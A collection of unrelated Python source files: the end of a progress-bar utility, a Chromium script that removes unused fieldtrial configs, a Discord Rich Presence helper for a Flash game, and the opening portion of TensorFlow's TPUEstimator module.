eta = ''
done = f'All done in {self.work_time:,.2f} seconds'
else:
eta = f'ETA: {self.eta:,.2f} seconds'
done = ''
args = {
'total_tasks': self.total_tasks,
'done_tasks': self.done_tasks,
'progress': self.progress,
'remaining': self.remaining,
'work_time': self.work_time,
'eta': eta,
'done': done,
'prompt': self.prompt,
'bar': '',
}
bar_size = max(10, self.width - len(self.format_spec.format_map(args)))
progress_size = round(bar_size * self.progress)
args['bar'] = self.progress_symbol * progress_size + self.blank_symbol * (bar_size - progress_size)
progress_str = self.format_spec.format_map(args)
return progress_str
def reset(self):
self.done_tasks = 0
self.done_time = None
self.last_output = -1
def output(self):
progress_str = self.format_progress()
self.last_output = self.progress
for output in self.outputs:
if isinstance(output, Callable):
output(progress_str)
elif isinstance(output, logging.Logger):
temp_log(logger=output, level=logging.INFO, msg=progress_str)
elif isinstance(output, (io.TextIOBase, logging.Logger)):
print('\r' + progress_str, file=output, end='')
else:
pass
def __call__(self, *args, **kwargs):
return self.format_progress()
def __next__(self):
try:
if (not self.tick_size) or self.progress >= self.tick_size + self.last_output:
self.output()
self.done_tasks += 1
return self.iter_task.__next__()
except StopIteration:
self.done_tasks = self.total_tasks
self.output()
raise StopIteration()
def __iter__(self):
self.reset()
self.start_time = time.time()
self.iter_task = self.tasks.__iter__()
return self
class GetInput(object):
def __init__(self, timeout=5, prompt_message: Optional[str] = None, default_value: Optional[str] = None):
if prompt_message is None:
prompt_message = f'Please respond in {timeout} seconds: '
self.timeout = timeout
self.default_value = default_value
self.prompt_message = prompt_message
self._input = None
self.input_thread: Optional[threading.Thread] = None
self.show()
def show(self):
self.input_thread = threading.Thread(target=self.get_input)
self.input_thread.daemon = True
self.input_thread.start()
self.input_thread.join(timeout=self.timeout)
# input_thread.terminate()
if self._input is None:
print(f"No input was given within {self.timeout} seconds. Use {self.default_value} as default value.")
self._input = self.default_value
def get_input(self):
self._input = None
self._input = input(self.prompt_message)
return
@property
def input(self):
return self._input
def count_ordinal(n: int) -> str:
"""
Convert an integer into its ordinal representation::
make_ordinal(0) => '0th'
make_ordinal(3) => '3rd'
make_ordinal(122) => '122nd'
make_ordinal(213) => '213th'
"""
n = int(n)
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return str(n) + suffix
|
cleanup_stale_fieldtrial_configs.py
|
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Simple script for cleaning up stale configs from fieldtrial_testing_config.
Methodology:
Scan for all study names that appear in fieldtrial config file,
and removes ones that don't appear anywhere in the codebase.
The script ignores WebRTC entries as those often lead to false positives.
Usage:
vpython tools/variations/cleanup_stale_fieldtrial_configs.py
Run with --help to get a complete list of options this script runs with.
If this script removes features that appear to be used in the codebase,
double-check the study or feature name for typos or case differences.
"""
from __future__ import print_function
import json
import optparse
import os
import subprocess
import sys
import threading
CONFIG_PATH = 'testing/variations/fieldtrial_testing_config.json'
PRESUBMIT_SCRIPT = 'testing/variations/PRESUBMIT.py'
THREAD_COUNT = 16
_LITERAL_CACHE = {}
def is_literal_used(literal):
"""Check if a given string literal is used in the codebase."""
if literal in _LITERAL_CACHE:
return _LITERAL_CACHE[literal]
git_grep_cmd = ('git', 'grep', '--threads', '2', '-l', '\"%s\"' % literal)
git_grep_proc = subprocess.Popen(git_grep_cmd, stdout=subprocess.PIPE)
# Check for >1 since fieldtrial_testing_config.json will always be a result.
if len(git_grep_proc.stdout.read().splitlines()) > 1:
_LITERAL_CACHE[literal] = True
return True
bash_find_cmd = ('bash', '-c', 'find', '.', '-type', 'f', '|', 'grep', '-E',
'\"\\.(h|cc)$\"', '|', 'grep', '-E',
'\"(/out/|/build/|/gen/)\"', '|', 'xargs', 'grep', '-l',
'\\\"%s\\\"' % literal)
bash_find_proc = subprocess.Popen(bash_find_cmd, stdout=subprocess.PIPE)
used = len(bash_find_proc.stdout.read().splitlines()) > 0
_LITERAL_CACHE[literal] = used
if not used:
print('Did not find', repr(literal))
return used
def is_study_used(study_name, configs):
"""Checks if a given study is used in the codebase."""
if study_name.startswith('WebRTC-'):
return True # Skip webrtc studies which give false positives.
if is_literal_used(study_name):
return True
for config in configs:
for experiment in config.get('experiments', []):
for feature in experiment.get('enable_features', []):
if is_literal_used(feature):
return True
for feature in experiment.get('disable_features', []):
if is_literal_used(feature):
return True
return False
def thread_func(thread_limiter, studies_map, study_name, configs):
"""Runs a limited number of tasks and updates the map with the results.
Args:
thread_limited: A lock used to limit the number of active threads.
studies_map: The map where confirmed studies are added to.
study_name: The name of the study to check.
configs: The configs for the given study.
Side-effect:
This function adds the study to |studies_map| if it used.
"""
thread_limiter.acquire()
try:
if is_study_used(study_name, configs):
studies_map[study_name] = configs
finally:
thread_limiter.release()
def main():
parser = optparse.OptionParser()
parser.add_option('--input_path',
help='Path to the fieldtrial config file to clean.')
parser.add_option('--output_path',
help='Path to write cleaned up fieldtrial config file.')
parser.add_option('--thread_count',
type='int',
help='The number of threads to use for scanning.')
opts, _ = parser.parse_args()
input_path = os.path.expanduser(opts.input_path or CONFIG_PATH)
output_path = os.path.expanduser(opts.output_path or CONFIG_PATH)
thread_limiter = threading.BoundedSemaphore(opts.thread_count or THREAD_COUNT)
with open(input_path) as fin:
studies = json.load(fin)
print('Loaded config from', input_path)
threads = []
clean_studies = {}
for study_name, configs in studies.items():
args = (thread_limiter, clean_studies, study_name, configs)
threads.append(threading.Thread(target=thread_func, args=args))
# Start all threads, then join all threads.
for t in threads:
t.start()
for t in threads:
t.join()
with open(output_path, 'wt') as fout:
json.dump(clean_studies, fout)
print('Wrote cleaned config to', output_path)
# Run presubmit script to format config file.
retcode = subprocess.call(['vpython', PRESUBMIT_SCRIPT, output_path])
if retcode != 0:
print('Failed to format output, manually run:')
print('vpython', PRESUBMIT_SCRIPT, output_path)
if __name__ == '__main__':
sys.exit(main())
|
car.py
|
'''
MIT License
Copyright (c) 2021 ImPurpl3
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import miniamf.adapters._sets
import miniamf.amf3
import miniamf.amf0
import pypresence
from miniamf import sol
from pypresence import Presence
import time
import os
import threading
import pythoncom
import psutil
import argparse
parser = argparse.ArgumentParser(description='Discord RPC for Red Ball Hacks')
parser.add_argument('-s', '--sol', dest="solPass", default="rpc", help='Name of SOL to Load')
parser.add_argument('-i', '--appid', '--id', dest="idPass", default="881010245147709440", help='Discord App ID')
parser.add_argument('-x', '--max', dest="maxPass", default="9", help='Maximum # of Levels', type=int)
parser.add_argument('-m', '--min', dest="minPass", default="8", help='Minimum # of Levels', type=int)
args = parser.parse_args()
if args.solPass:
solArg = args.solPass
if args.idPass:
idArg = args.idPass
def onMin():
global isMin
isMin = True
def onMax():
global isMax
isMax = True
if args.maxPass:
maxArg = args.maxPass
if args.maxPass == 9:
isMax = False
else:
onMax()
if args.minPass:
minArg = args.minPass - 1
if args.minPass == 8:
isMin = False
else:
onMin()
print("Startup Initialized...")
rpc = Presence(idArg)
rpc.connect()
print(f"RPC Connected ({idArg})")
time.sleep(3)
predir = os.path.expandvars(r'%APPDATA%/Macromedia/Flash Player/#SharedObjects/')
postdir = os.listdir(predir)
posterdir = ''.join(postdir)
print(f'SO Folder Key is {posterdir}')
sendto_dir = predir + posterdir + "/localhost/" + solArg + ".sol"
flag = 0
if os.path.exists(sendto_dir) == True:
solLoad = sol.load(sendto_dir)
rpcSetSol = solLoad.get("setting")
print(f"SOL File found and Loaded ({args.solPass})")
SOLchk = True
else:
print(f"SOL File not found ({args.solPass})")
SOLchk = False
os.system('pause')
if SOLchk == True:
print("Searching for Flash...")
for p in psutil.process_iter(attrs=['pid', 'name']):
if p.info['name'] == "Flash Player.exe":
flag = 1
def checkFlash():
pythoncom.CoInitialize()
import subprocess
global flag
global rpcSetFlag
while flag == 1:
progs = str(subprocess.check_output('tasklist'))
if "Flash Player.exe" in progs:
flag = 1
else:
rpcSetFlag = True
flag = 0
th = threading.Thread(target=checkFlash, name='flashchk')
if flag == 1:
th.daemon = True
th.start()
print("Thread Started")
def updateRPC():
solLoad = sol.load(sendto_dir)
detailSol = solLoad.get("detail")
rpcSetSol = solLoad.get("setting")
global maxArg
global minArg
global isMax
global isMin
if isMax == True or isMin == True:
if rpcSetSol == "On":
minLvl = minArg
while minLvl < maxArg:
minLvl = minLvl + 1
if detailSol == "In menu":
rpc.update(details="In Menu", large_image="icon")
elif detailSol == f"Level {minLvl}":
rpc.update(state="On Level", party_size=[minLvl,maxArg], small_image=str(minArg), large_image="icon")
else:
print('RPC set to "Off" detected')
global rpcSetFlag
rpcSetFlag = True
os.system('pause')
else:
if rpcSetSol == "On":
if detailSol == "In menu":
rpc.update(details="In Menu", large_image="car_icon")
elif detailSol == "Level 8":
rpc.update(state="On Level", party_size=[8,9], small_image="8", large_image="car_icon")
elif detailSol == "Level 9":
rpc.update(state="On Level", party_size=[9,9], small_image="9", large_image="car_icon")
else:
print('RPC set to "Off" detected')
rpcSetFlag = True
os.system('pause')
rpcSetFlag = False
if flag == 1:
if rpcSetSol == "On":
print("RPC is Running")
while rpcSetFlag == False:
updateRPC()
time.sleep(1)
if flag == 0:
rpc.close()
print("Game Exit Detected")
th.join()
os.system('pause')
else:
if flag == 1:
print('RPC set to "Off" in game so RPC was not ran')
os.system('pause')
elif SOLchk == True:
print("RPC not ran because Flash Player was not found")
os.system('pause')
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import tensorflow as tf
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import evaluation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
# Track the adoption of TPUEstimator
_tpu_estimator_gauge = tf.compat.v2.__internal__.monitoring.BoolGauge(
'/tensorflow/api/tpu_estimator',
'Whether the program uses tpu estimator or not.')
if ops.get_to_proto_function('{}_{}'.format(_TPU_ESTIMATOR,
_ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or tf.compat.v1.get_default_graph()
if tf.compat.v1.train.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return tf.compat.v1.get_variable(
tf.compat.v1.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=tf.dtypes.int64,
initializer=tf.compat.v1.initializers.zeros(),
trainable=False,
use_resource=True,
collections=[
tf.compat.v1.GraphKeys.GLOBAL_VARIABLES,
tf.compat.v1.GraphKeys.GLOBAL_STEP
])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = tf.compat.v1.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(tf.compat.v1.train.get_global_step()):
with tf.compat.v1.variable_scope(
_TPU_ESTIMATOR, reuse=tf.compat.v1.AUTO_REUSE):
return tf.compat.v1.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=tf.compat.v1.initializers.zeros(),
shape=[],
dtype=tf.dtypes.int32,
trainable=False,
collections=[collection_name, tf.compat.v1.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
tf.debugging.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in tf.compat.v1.trainable_variables()
]
else:
return [tf.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return tf.compat.v1.assign_add(
eval_step,
tf.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
tf.compat.v1.logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
cls._host_calls = {}
if eval_metrics is not None:
cls._host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
cls._host_calls['host_call'] = host_call
_OutfeedHostCall.validate(cls._host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, tf.compat.v1.train.SessionRunHook):
raise TypeError(
'All hooks must be SessionRunHook instances, given: {}'.format(
hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(self._host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(tf.compat.v1.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
tf.compat.v1.logging.debug('%s read iterations %s', self._name,
iterations)
if iterations == _SIGNAL.STOP:
tf.compat.v1.logging.info('%s received shutdown signal, stopping.',
self._name)
return
yield iterations
def join(self):
tf.compat.v1.logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(tf.compat.v1.train.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
tf.compat.v1.logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [
tf.compat.v1.tpu.shutdown_system(job=self._master_job)
]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(tf.compat.v2.summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
tf.compat.v1.logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
tf.compat.v1.logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
tf.compat.v1.logging.debug('Infeed enqueue for iteration (%d, %d)',
count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
tf.compat.v1.logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
tf.compat.v1.logging.debug('Outfeed dequeue for iteration (%d, %d)',
count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
tf.compat.v1.logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
tf.compat.v1.logging.error('Compilation failed: {}'.format(
proto.status_error_message))
coord.request_stop()
else:
tf.compat.v1.logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
tf.compat.v1.logging.info('Init TPU system')
start = time.time()
with tf.Graph().as_default():
with tf.compat.v1.Session(
self._master, config=self._session_config) as sess:
sess.run(
tf.compat.v1.tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
tf.compat.v1.logging.info('Initialized TPU in %d seconds',
time.time() - start)
session.run(
self._init_ops,
options=tf.compat.v1.RunOptions(timeout_in_ms=30 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
tf.compat.v1.logging.info(
'Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(
session, shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
tf.compat.v1.logging.info('Enqueue next (%d) batch(es) of data to infeed.',
iterations)
self._infeed_controller.send_next_batch_signal(iterations)
tf.compat.v1.logging.info(
'Dequeue next (%d) batch(es) of data from outfeed.', iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
tf.compat.v1.logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
tf.compat.v1.logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
